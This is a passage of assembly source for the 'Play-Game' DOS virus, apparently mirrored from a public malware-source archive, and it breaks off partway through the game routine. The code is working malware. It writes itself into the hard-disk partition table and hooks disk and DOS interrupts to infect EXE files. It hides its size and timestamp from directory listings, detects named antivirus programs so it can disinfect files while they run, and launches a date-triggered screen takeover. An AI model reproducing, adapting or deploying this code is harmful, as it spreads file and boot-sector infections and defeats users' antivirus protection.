mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
1266 lines
44 KiB
NASM
1266 lines
44 KiB
NASM
|
;------------------------------------------------------------------------------
|
|||
|
; Play-Game VIRUS version 1
|
|||
|
;
|
|||
|
; Use TASM 2.01 to compile this source
|
|||
|
; (other assemblers will probably not produce the same result)
|
|||
|
;
|
|||
|
; Disclaimer:
|
|||
|
; This file is only for educational purposes. The author takes no
|
|||
|
; responsibility for anything anyone does with this file. Do not
|
|||
|
; modify this file!
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
.model tiny
|
|||
|
.RADIX 16
|
|||
|
.code
|
|||
|
|
|||
|
|
|||
|
VERSION equ 1
|
|||
|
FILELEN equ offset last - first ;Length of virus.
|
|||
|
VIRSEC equ (FILELEN+1FF)/200 ;Number of sectors for virus
|
|||
|
VIRKB equ (FILELEN+3FF+100)/400 ;Length in kB.
|
|||
|
SECLEN equ 200 ;length of a sector.
|
|||
|
STACKLEN equ 200 ;Wanted length of stack in
|
|||
|
;infected file.
|
|||
|
STACKOFF equ ((FILELEN+SECLEN+STACKLEN+11)/2)*2 ;Stack offset in
|
|||
|
;infected file.
|
|||
|
DATAPAR equ (SECLEN+STACKLEN+20)/10 ;Minimal extra memory to
|
|||
|
;allocate for infected file
|
|||
|
;(area to load part. table
|
|||
|
;and room for stack).
|
|||
|
BUFLEN equ 1C ;Length of buffer.
|
|||
|
BOOTLEN equ boot_end - boot_begin ;Length of boot-routine.
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Data area for virus.
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
org 00F0
|
|||
|
|
|||
|
hook db ? ;Flag for hooking int21
|
|||
|
minibuf db (4) dup (?) ;Mini buffer for internal use.
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Data area for game.
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
bombs db ? ;Number of bombs.
|
|||
|
pos db ? ;Position.
|
|||
|
oldpos db ? ;Previous position.
|
|||
|
level db ?
|
|||
|
kleur db ?
|
|||
|
timer db ?
|
|||
|
tijd dw ?
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Begin of virus, installation in partition table of harddisk
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
org 0100
|
|||
|
|
|||
|
first: db '[ MK / TridenT ]' ;Author + Group.
|
|||
|
|
|||
|
call next
|
|||
|
next: pop si ;Get IP.
|
|||
|
sub si,13 ;Calculate relative offset.
|
|||
|
mov di,0100
|
|||
|
cld
|
|||
|
|
|||
|
call push_all ;Save some registers.
|
|||
|
|
|||
|
push cs ;Make DS and ES equal to CS.
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
pop es
|
|||
|
|
|||
|
mov ah,30 ;Check if DOS version >= 4.0
|
|||
|
int 21
|
|||
|
cmp al,4
|
|||
|
jb not_install
|
|||
|
|
|||
|
cmp ax,0DEADh ;Check if another TridenT
|
|||
|
je not_install ;(multi-partite) virus is
|
|||
|
;resident.
|
|||
|
|
|||
|
mov ax,0FE02 ;Check if Tequila virus
|
|||
|
int 21 ;is resident.
|
|||
|
cmp ax,01FDh
|
|||
|
je not_install
|
|||
|
|
|||
|
mov ax,33E4 ;Check if virus is already
|
|||
|
int 21 ;resident.
|
|||
|
cmp ah,0A5
|
|||
|
je not_install
|
|||
|
|
|||
|
call infect_part
|
|||
|
|
|||
|
not_install: mov ah,2A ;Ask date.
|
|||
|
int 21
|
|||
|
cmp dh,12d ;december?
|
|||
|
jb dont_play
|
|||
|
mov ah,2C ;Ask time.
|
|||
|
int 21
|
|||
|
cmp ch,21d ;time > 21:00 ?
|
|||
|
jb dont_play
|
|||
|
|
|||
|
mov ax,33E5 ;Play the game!
|
|||
|
int 21
|
|||
|
|
|||
|
dont_play: call pop_all ;Restore registers.
|
|||
|
|
|||
|
add si,offset buffer-100
|
|||
|
cmp byte ptr cs:[si],'M' ;Check if generation 0.
|
|||
|
je entryE
|
|||
|
|
|||
|
int 20 ;It was a COM file (gen. 0).
|
|||
|
|
|||
|
entryE: mov bx,ds ;Calculate CS.
|
|||
|
add bx,low 10
|
|||
|
mov cx,bx
|
|||
|
add bx,cs:[si+0E]
|
|||
|
cli ;Restore SS and SP.
|
|||
|
mov ss,bx
|
|||
|
mov sp,cs:[si+10]
|
|||
|
sti
|
|||
|
add cx,cs:[si+16]
|
|||
|
push cx ;Push new CS on stack.
|
|||
|
push cs:[si+14] ;Push new IP on stack.
|
|||
|
retf
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Infect partition table sector
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
infect_part: lea bx,[si+last-100] ;Read partition table
|
|||
|
mov ax,0201 ;at end of virus.
|
|||
|
mov cx,1
|
|||
|
mov dx,80
|
|||
|
int 13
|
|||
|
jc not_infect_par
|
|||
|
|
|||
|
cmp word ptr [bx],'KM' ;Check if already infected.
|
|||
|
je not_infect_par
|
|||
|
|
|||
|
cmp word ptr [bx],05EA ;Check if infected with
|
|||
|
je not_infect_par ;Stoned or Michelangelo.
|
|||
|
|
|||
|
lea di,[bx+01BE] ;Check partition info.
|
|||
|
mov bl,4
|
|||
|
check_part: cmp byte ptr [di+4],0 ;Skip if not a valid partition.
|
|||
|
je next_part
|
|||
|
cmp word ptr [di+0A],0 ;Enough room for virus?
|
|||
|
jne next_part
|
|||
|
cmp word ptr [di+8],VIRSEC+2
|
|||
|
jb not_infect_par ;Quit if not enough room.
|
|||
|
next_part: add di,10
|
|||
|
dec bl
|
|||
|
jnz check_part
|
|||
|
|
|||
|
lea bx,[si+last-100] ;Save original partition table
|
|||
|
mov ax,0301 ;to sector 2.
|
|||
|
mov cx,2
|
|||
|
int 13
|
|||
|
jc not_infect_par
|
|||
|
|
|||
|
lea bx,[si+first-100] ;Write the virus to sector 3.
|
|||
|
mov ax,0300+VIRSEC
|
|||
|
mov cx,3
|
|||
|
int 13
|
|||
|
jc not_infect_par
|
|||
|
|
|||
|
lea di,[si+last-100] ;Infect part table.
|
|||
|
lea si,[si+boot_begin-100]
|
|||
|
mov bx,di
|
|||
|
mov cx,BOOTLEN
|
|||
|
rep movsb
|
|||
|
|
|||
|
mov ax,0301 ;Write infected partition table
|
|||
|
mov cx,1 ;to sector 1.
|
|||
|
int 13
|
|||
|
|
|||
|
not_infect_par: ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Partition table routine
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
boot_begin: db 'MK' ;Signature (= DEC BP, DEC BX).
|
|||
|
|
|||
|
cld ;Initialise segments + stack.
|
|||
|
cli
|
|||
|
xor ax,ax
|
|||
|
mov ds,ax
|
|||
|
mov ss,ax
|
|||
|
mov sp,7C00
|
|||
|
sti
|
|||
|
|
|||
|
mov di,0400 ;Adjust memory size.
|
|||
|
mov ax,ds:[di+13]
|
|||
|
sub ax,VIRKB
|
|||
|
mov ds:[di+13],ax
|
|||
|
|
|||
|
mov cl,6 ;Calculate segment for
|
|||
|
shl ax,cl ;resident virus.
|
|||
|
mov es,ax
|
|||
|
|
|||
|
mov cx,BOOTLEN ;Copy virus to top.
|
|||
|
mov si,sp ;SP=7C00
|
|||
|
xor di,di
|
|||
|
rep movsb
|
|||
|
|
|||
|
mov bx,offset here-offset boot_begin ;Jump to top.
|
|||
|
push es
|
|||
|
push bx
|
|||
|
retf
|
|||
|
|
|||
|
here: mov ax,0200+VIRSEC ;Load complete virus.
|
|||
|
mov cx,3
|
|||
|
mov dx,0080
|
|||
|
mov bx,0100
|
|||
|
int 13
|
|||
|
jc load_part
|
|||
|
|
|||
|
cli
|
|||
|
mov ax,offset ni13 ;Set new vector 13.
|
|||
|
xchg ds:[4*13],ax
|
|||
|
mov cs:[oi13],ax ;Save old vector 13.
|
|||
|
mov ax,es
|
|||
|
xchg ds:[4*13+2],ax
|
|||
|
mov cs:[oi13+2],ax
|
|||
|
|
|||
|
les bx,ds:[4*21] ;Get original vector 21.
|
|||
|
mov cs:[oi21],bx
|
|||
|
mov cs:[oi21+2],es
|
|||
|
sti
|
|||
|
|
|||
|
mov byte ptr cs:[hook],1 ;Turn on hook-flag.
|
|||
|
|
|||
|
load_part: mov di,5
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
part_loop: mov ax,0201 ;Load original part. sector.
|
|||
|
mov cx,2
|
|||
|
mov dx,0080
|
|||
|
mov bx,sp
|
|||
|
int 13
|
|||
|
jnc jump_part
|
|||
|
|
|||
|
xor ax,ax ;Reset Drive
|
|||
|
int 13
|
|||
|
dec di
|
|||
|
jnz part_loop ;Try again.
|
|||
|
int 18 ;Error: activate ROM BASIC.
|
|||
|
|
|||
|
jump_part: push ds ;Push next address.
|
|||
|
push bx
|
|||
|
retf
|
|||
|
boot_end:
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Int 13 handler
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
ni13: cmp byte ptr cs:[hook],0 ;Is int 21 already hooked?
|
|||
|
je do_int13
|
|||
|
|
|||
|
push ds
|
|||
|
push es
|
|||
|
push bx
|
|||
|
push ax
|
|||
|
cli
|
|||
|
|
|||
|
xor ax,ax
|
|||
|
mov ds,ax
|
|||
|
|
|||
|
les bx,ds:[4*21] ;Compare int 21 vector
|
|||
|
mov ax,es ;with saved old vector.
|
|||
|
|
|||
|
cmp ax,800
|
|||
|
ja dont_hook
|
|||
|
cmp bx,cs:[oi21]
|
|||
|
jne hook_21
|
|||
|
cmp ax,cs:[oi21+2]
|
|||
|
je dont_hook
|
|||
|
|
|||
|
hook_21: mov cs:[oi21],bx ;Save old vector 21.
|
|||
|
mov cs:[oi21+2],ax
|
|||
|
|
|||
|
mov ds:[4*21],offset ni21 ;Set new vector 21.
|
|||
|
mov ds:[4*21+2],cs
|
|||
|
|
|||
|
mov byte ptr cs:[hook],0 ;Don't hook int 21 anymore.
|
|||
|
|
|||
|
dont_hook: sti
|
|||
|
pop ax
|
|||
|
pop bx
|
|||
|
pop es
|
|||
|
pop ds
|
|||
|
|
|||
|
|
|||
|
do_int13: cmp cx,1 ;Check if part. table
|
|||
|
jne orgint13 ;is read or written.
|
|||
|
cmp dx,80
|
|||
|
jne orgint13
|
|||
|
cmp ah,2
|
|||
|
jb orgint13
|
|||
|
cmp ah,3
|
|||
|
ja orgint13
|
|||
|
or al,al
|
|||
|
jz orgint13
|
|||
|
|
|||
|
push cx
|
|||
|
dec al
|
|||
|
jz nothing_left
|
|||
|
push ax ;Do original function
|
|||
|
push bx
|
|||
|
add bx,0200
|
|||
|
inc cx
|
|||
|
pushf
|
|||
|
call dword ptr cs:[oi13]
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
|
|||
|
nothing_left: mov al,1 ;Read/write redirected
|
|||
|
mov cx,2 ;partition table.
|
|||
|
pushf
|
|||
|
call dword ptr cs:[oi13]
|
|||
|
pop cx
|
|||
|
retf 2
|
|||
|
|
|||
|
|
|||
|
orgint13: db 0EA
|
|||
|
oi13 dw 0, 0 ;Original int 13 vector.
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Interupt 21 handler
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
ni21: pushf
|
|||
|
|
|||
|
cmp ax,33E4 ;Installation-check ?
|
|||
|
jne not_ic
|
|||
|
mov ax,0A500+VERSION ;Yes? Return a signature.
|
|||
|
popf
|
|||
|
iret
|
|||
|
|
|||
|
not_ic: cmp ax,33E5 ;Play game ?
|
|||
|
jne not_pg
|
|||
|
call play_game
|
|||
|
popf
|
|||
|
iret
|
|||
|
|
|||
|
not_pg: call push_all ;Check if interupt came from
|
|||
|
call getname ;a program that may not see
|
|||
|
mov dx,offset namesHI ;true length of infected file
|
|||
|
mov cx,2+11d ;(AV program or 'DIR').
|
|||
|
call checknames
|
|||
|
call pop_all
|
|||
|
jne no_hide
|
|||
|
|
|||
|
cmp ah,11 ;Findfirst/findnext FCB?
|
|||
|
je its_11_12
|
|||
|
cmp ah,12
|
|||
|
jne not_11_12
|
|||
|
its_11_12: popf
|
|||
|
call findFCB
|
|||
|
retf 2
|
|||
|
|
|||
|
not_11_12: cmp ah,4E ;Findfirst/findnext handle?
|
|||
|
je its_4E_4F
|
|||
|
cmp ah,4F
|
|||
|
jne no_hide
|
|||
|
its_4E_4F: popf
|
|||
|
call findhndl
|
|||
|
retf 2
|
|||
|
|
|||
|
|
|||
|
no_hide: call push_all ;Save registers.
|
|||
|
|
|||
|
cmp ax,6C00 ;Open from DOS 4.0+ ?
|
|||
|
jne not_6C00
|
|||
|
call f_open2
|
|||
|
jmp short exit
|
|||
|
|
|||
|
not_6C00: cmp ah,3Dh ;File open?
|
|||
|
jne not_3D
|
|||
|
call f_open
|
|||
|
jmp short exit
|
|||
|
|
|||
|
not_3D: cmp ah,3E ;File close?
|
|||
|
jne not_3E
|
|||
|
call f_close
|
|||
|
jmp short exit
|
|||
|
|
|||
|
not_3E: cmp ax,4B00 ;Program execute?
|
|||
|
jne exit
|
|||
|
call f_execute
|
|||
|
|
|||
|
exit: call pop_all ;Restore registers.
|
|||
|
|
|||
|
popf
|
|||
|
|
|||
|
db 0EA ;Original int 21.
|
|||
|
oi21 dw 0, 0
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Interupt 24 handler
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
ni24: mov al,3 ;To avoid 'Abort, Retry, ...'
|
|||
|
iret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Call original int21
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
DOS: pushf
|
|||
|
call dword ptr cs:[oi21]
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Hide the virus from filelength
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
findFCB: call DOS ;Call original function.
|
|||
|
or al,al
|
|||
|
jne ret1
|
|||
|
pushf
|
|||
|
push bx
|
|||
|
push ax
|
|||
|
push es
|
|||
|
mov ah,2F ;Ask DTA adres.
|
|||
|
call DOS
|
|||
|
cmp byte ptr es:[bx],0FF ;Extended FCB?
|
|||
|
jne vv1
|
|||
|
add bx,7
|
|||
|
vv1: mov al,byte ptr es:[bx+17] ;Check if infected
|
|||
|
and al,1Fh ;(seconds=62).
|
|||
|
cmp al,1Fh
|
|||
|
jne dont_hide
|
|||
|
sub word ptr es:[bx+1Dh],FILELEN ;Hide virus length.
|
|||
|
sbb word ptr es:[bx+1F],0
|
|||
|
dec bx
|
|||
|
jmp short hide_time
|
|||
|
|
|||
|
|
|||
|
findhndl: call DOS ;Call original function.
|
|||
|
jc ret1
|
|||
|
pushf
|
|||
|
push bx
|
|||
|
push ax
|
|||
|
push es
|
|||
|
mov ah,2F ;ask DTA adres
|
|||
|
call DOS
|
|||
|
mov al,byte ptr es:[bx+16] ;Check if infected.
|
|||
|
and al,1Fh
|
|||
|
cmp al,1Fh
|
|||
|
jne dont_hide
|
|||
|
sub word ptr es:[bx+1A],FILELEN ;Hide virus length.
|
|||
|
sbb word ptr es:[bx+1C],0
|
|||
|
hide_time: and byte ptr es:[bx+16],0EFh ;Also hide seconds.
|
|||
|
dont_hide: pop es
|
|||
|
pop ax
|
|||
|
pop bx
|
|||
|
popf
|
|||
|
ret1: ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Try to infect or disinfect the file
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
f_close: cmp bx,5 ;Is handle >= 5?
|
|||
|
jb ret1 ;Quit if not.
|
|||
|
mov ah,45 ;Duplicate handle
|
|||
|
jmp short doit
|
|||
|
|
|||
|
f_execute: mov ah,3Dh ;Open file
|
|||
|
doit: call DOS
|
|||
|
jc ret1
|
|||
|
xchg ax,bx
|
|||
|
mov bp,1 ;Flag for infect.
|
|||
|
jmp short get_ctrlbrk
|
|||
|
|
|||
|
|
|||
|
f_open2: mov dx,si ;Use 'normal' open function
|
|||
|
mov ah,3Dh ;instead of 6C00 function.
|
|||
|
f_open: call DOS
|
|||
|
jc ret1
|
|||
|
xchg ax,bx
|
|||
|
xor bp,bp ;Flag for disinfect.
|
|||
|
|
|||
|
|
|||
|
get_ctrlbrk: cld
|
|||
|
|
|||
|
mov ax,3300 ;Get ctrl-break flag.
|
|||
|
call DOS
|
|||
|
push dx
|
|||
|
|
|||
|
cwd ;Disable Ctrl-break.
|
|||
|
inc ax
|
|||
|
push ax
|
|||
|
call DOS
|
|||
|
|
|||
|
mov dx,bx
|
|||
|
mov ax,3524 ;Get int24 vector.
|
|||
|
call DOS
|
|||
|
push bx
|
|||
|
push es
|
|||
|
mov bx,dx
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov dx,offset ni24 ;Install new int24 handler.
|
|||
|
mov ah,25
|
|||
|
push ax
|
|||
|
call DOS
|
|||
|
|
|||
|
mov ax,1220 ;Get pointer to file table
|
|||
|
push bx
|
|||
|
int 2F
|
|||
|
mov bl,es:[di]
|
|||
|
mov al,16 ;(Avoid [512] signature...)
|
|||
|
mov ah,12
|
|||
|
int 2F
|
|||
|
pop bx ;ES:DI -> file table
|
|||
|
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
|
|||
|
push [di+2] ;Save attribute & open-mode.
|
|||
|
push [di+4]
|
|||
|
|
|||
|
cmp word ptr [di+28],'XE' ;Check if extension is .EXE
|
|||
|
jne close1
|
|||
|
cmp byte ptr [di+2A],'E'
|
|||
|
jne close1
|
|||
|
|
|||
|
; cmp word ptr [di+20],'XX' ;Check if name is 'XX*.EXE'
|
|||
|
; jne close1 ;(only for test purposes).
|
|||
|
|
|||
|
test bp,bp ;Infect or disinfect?
|
|||
|
jz check_disinf
|
|||
|
|
|||
|
mov ax,word ptr [di+20] ;Check if file may be infected.
|
|||
|
mov dx,offset namesSC
|
|||
|
mov cx,11d+4
|
|||
|
call checknames
|
|||
|
je close1
|
|||
|
jmp short go_on
|
|||
|
|
|||
|
check_disinf: call getname ;Check if file must be
|
|||
|
mov dx,offset namesSC ;disinfected (only if an
|
|||
|
mov cx,11d ;AV program is active).
|
|||
|
call checknames
|
|||
|
jne close1
|
|||
|
|
|||
|
go_on: mov byte ptr [di+2],2 ;Open file for both read/write.
|
|||
|
mov byte ptr [di+4],0 ;Clear attributes
|
|||
|
call gotobegin
|
|||
|
push ax ;Save old file offset
|
|||
|
push dx
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov cx,BUFLEN ;Read begin of file
|
|||
|
mov si,offset buffer ;into buffer.
|
|||
|
mov dx,si
|
|||
|
call read
|
|||
|
|
|||
|
call checkfile ;Check if file is OK to infect
|
|||
|
jc close2 ;or disinfect.
|
|||
|
|
|||
|
mov ax,word ptr [si+12] ;Already infected?
|
|||
|
add al,ah
|
|||
|
cmp al,'#'
|
|||
|
je is_infected
|
|||
|
|
|||
|
test bp,bp ;Must it be infected?
|
|||
|
jz close2
|
|||
|
|
|||
|
call do_infect
|
|||
|
|
|||
|
is_infected: test bp,bp ;Must it be disinfected?
|
|||
|
jnz close2
|
|||
|
|
|||
|
call do_disinfect
|
|||
|
|
|||
|
close2: push es
|
|||
|
pop ds
|
|||
|
|
|||
|
pop dx ;Restore file offset.
|
|||
|
pop ax
|
|||
|
call goto
|
|||
|
or byte ptr [di+6],40 ;Don't change file-time.
|
|||
|
|
|||
|
close1: mov ah,3E ;Close the file.
|
|||
|
call DOS
|
|||
|
|
|||
|
or byte ptr [di+5],40 ;No EOF on next close.
|
|||
|
pop [di+4] ;Restore attribute & open-mode.
|
|||
|
pop [di+2]
|
|||
|
|
|||
|
pop ax ;Restore int 24 vector.
|
|||
|
pop ds
|
|||
|
pop dx
|
|||
|
call DOS
|
|||
|
|
|||
|
pop ax ;Restore ctrl-break flag.
|
|||
|
pop dx
|
|||
|
call DOS
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Special filenames
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
namesHI db 'CO', '4D' ;COMMAND.COM and 4DOS.
|
|||
|
namesSC db 'SC', 'CL', 'VS', 'NE' ;AV programs.
|
|||
|
db 'HT', 'TB', 'VI', 'F-'
|
|||
|
db 'FI', 'GI', 'IM'
|
|||
|
namesCH db 'RA', 'FE', 'MT', 'BR' ;Some self-checking
|
|||
|
;programs.
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Check the file
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
checkfile: cmp word ptr [si],'ZM' ;Is it a normal EXE ?
|
|||
|
jne not_good
|
|||
|
|
|||
|
cmp word ptr [si+18],40 ;Check if it is a windows/OS2
|
|||
|
jb not_win ;EXE file.
|
|||
|
|
|||
|
mov ax,003C ;Read pointer to NE header.
|
|||
|
cwd
|
|||
|
call readbytes
|
|||
|
jc not_good
|
|||
|
|
|||
|
mov ax,word ptr [si+BUFLEN] ;Read NE header.
|
|||
|
mov dx,word ptr [si+BUFLEN+2]
|
|||
|
call readbytes
|
|||
|
jc not_good
|
|||
|
|
|||
|
cmp byte ptr [si+BUFLEN+1],'E' ;Quit if it is a NE
|
|||
|
je not_good ;header.
|
|||
|
|
|||
|
not_win: call getlen
|
|||
|
call calclen ;Check for internal overlays.
|
|||
|
cmp word ptr [si+4],ax
|
|||
|
jne not_good
|
|||
|
cmp word ptr [si+2],dx
|
|||
|
jne not_good
|
|||
|
|
|||
|
cmp word ptr [si+0C],0 ;High memory allocation?
|
|||
|
je not_good
|
|||
|
|
|||
|
cmp word ptr [si+1A],0 ;Overlay nr. not zero?
|
|||
|
jne not_good
|
|||
|
|
|||
|
clc ;File is OK.
|
|||
|
ret
|
|||
|
|
|||
|
not_good: stc ;File is not OK.
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Write virus to the program
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
do_infect: call getlen ;Go to end of file.
|
|||
|
call goto
|
|||
|
|
|||
|
mov dx,0100 ;Write virus.
|
|||
|
mov cx,FILELEN
|
|||
|
call write
|
|||
|
cmp ax,cx ;Are all bytes written?
|
|||
|
jne not_infect
|
|||
|
|
|||
|
call getoldlen ;Calculate new CS & IP.
|
|||
|
mov cx,0010
|
|||
|
div cx
|
|||
|
sub ax,word ptr [si+8]
|
|||
|
add dx,low 10
|
|||
|
|
|||
|
mov word ptr [si+16],ax ;Put CS in header.
|
|||
|
mov word ptr [si+0E],ax ;Put SS in header.
|
|||
|
mov word ptr [si+14],dx ;Put IP in header.
|
|||
|
mov word ptr [si+10],STACKOFF ;Put SP in header.
|
|||
|
|
|||
|
call getlen ;Put new length in header.
|
|||
|
call calclen
|
|||
|
mov word ptr [si+4],ax
|
|||
|
mov word ptr [si+2],dx
|
|||
|
|
|||
|
push di
|
|||
|
lea di,[si+0A] ;Adjust mem. allocation info.
|
|||
|
call mem_adjust
|
|||
|
lea di,[si+0C]
|
|||
|
call mem_adjust
|
|||
|
pop di
|
|||
|
|
|||
|
call gotobegin ;Write new begin of file.
|
|||
|
in al,40
|
|||
|
mov ah,'#'
|
|||
|
sub ah,al
|
|||
|
mov word ptr [si+12],ax
|
|||
|
mov cx,BUFLEN
|
|||
|
mov dx,si
|
|||
|
call write
|
|||
|
|
|||
|
or byte ptr es:[di+0Dh],1F ;set filetime to 62 sec.
|
|||
|
|
|||
|
not_infect: ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Disinfect the program
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
do_disinfect: call getoldlen ;Go to original end of file
|
|||
|
add ax,(offset buffer-100)
|
|||
|
adc dx,0
|
|||
|
call goto ;Go to buffer in virus.
|
|||
|
|
|||
|
mov dx,si ;Read buffer.
|
|||
|
mov cx,BUFLEN
|
|||
|
call read
|
|||
|
|
|||
|
cmp word ptr [si],'ZM' ;Is there an EXE header
|
|||
|
jne not_disinfect ;in the buffer?
|
|||
|
|
|||
|
call gotobegin ;Write the buffer to
|
|||
|
mov dx,si ;begin of file.
|
|||
|
mov cx,BUFLEN
|
|||
|
call write
|
|||
|
|
|||
|
call getoldlen ;Restore original length
|
|||
|
mov es:[di+11],ax ;of file.
|
|||
|
mov es:[di+13],dx
|
|||
|
|
|||
|
and byte ptr es:[di+0Dh],0E0 ;Seconds = 0.
|
|||
|
|
|||
|
not_disinfect: ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Get name of current process
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
getname: push ds
|
|||
|
push bx
|
|||
|
|
|||
|
mov ah,62 ;Get PSP address.
|
|||
|
call DOS
|
|||
|
dec bx
|
|||
|
mov ds,bx
|
|||
|
mov ax,ds:[0008] ;Get first 2 characters
|
|||
|
;of current process name.
|
|||
|
pop bx
|
|||
|
pop ds
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Check names
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
checknames: push di
|
|||
|
push es
|
|||
|
|
|||
|
push cs ;Search name in list CS:DX
|
|||
|
pop es
|
|||
|
mov di,dx
|
|||
|
repnz scasw
|
|||
|
|
|||
|
pop es
|
|||
|
pop di
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Calculate length for EXE header
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
calclen: mov cx,0200 ;Divide by 200h
|
|||
|
div cx
|
|||
|
or dx,dx ;Correction?
|
|||
|
jz no_cor
|
|||
|
inc ax
|
|||
|
no_cor: ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Adjust mem allocation info in EXE header
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
mem_adjust: cmp word ptr [di],DATAPAR ;Enough memory allocated?
|
|||
|
jnb mem_ok
|
|||
|
mov word ptr [di],DATAPAR ;Minimum amount to allocate.
|
|||
|
mem_ok: ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Read a few bytes
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
readbytes: call goto ;Go to DX:AX and read 4 bytes
|
|||
|
mov dx,offset minibuf ;from that location into
|
|||
|
mov cx,4 ;mini-buffer.
|
|||
|
read: mov ah,3F
|
|||
|
call DOS
|
|||
|
ret
|
|||
|
|
|||
|
write: mov ah,40 ;Write function.
|
|||
|
call DOS
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Get original length of program
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
getoldlen: call getlen
|
|||
|
sub ax,FILELEN
|
|||
|
sbb dx,0
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Get length of program
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
getlen: mov ax,es:[di+11]
|
|||
|
mov dx,es:[di+13]
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Goto new offset DX:AX
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
gotobegin: xor ax,ax
|
|||
|
cwd
|
|||
|
goto: xchg ax,es:[di+15]
|
|||
|
xchg dx,es:[di+17]
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Push all registers on stack
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
push_all: push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push si
|
|||
|
push di
|
|||
|
push bp
|
|||
|
push ds
|
|||
|
push es
|
|||
|
mov bp,sp
|
|||
|
jmp [bp+12]
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Pop all registers from stack
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
pop_all: pop ax
|
|||
|
mov bp,sp
|
|||
|
mov [bp+12],ax
|
|||
|
pop es
|
|||
|
pop ds
|
|||
|
pop bp
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
; Game
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
play_game: call rnd_init ;Initialize random number
|
|||
|
;generator.
|
|||
|
mov ah,0F ;Get video mode.
|
|||
|
int 10
|
|||
|
|
|||
|
xor ah,ah ;Clear screen and set to
|
|||
|
push ax ;40 column mode.
|
|||
|
mov al,1
|
|||
|
int 10
|
|||
|
|
|||
|
mov ah,3 ;Clear cursor.
|
|||
|
int 10
|
|||
|
push cx
|
|||
|
mov ah,1
|
|||
|
xor cx,cx
|
|||
|
int 10
|
|||
|
|
|||
|
start_game: push cs
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
pop es
|
|||
|
|
|||
|
xor al,al ;Clear screen
|
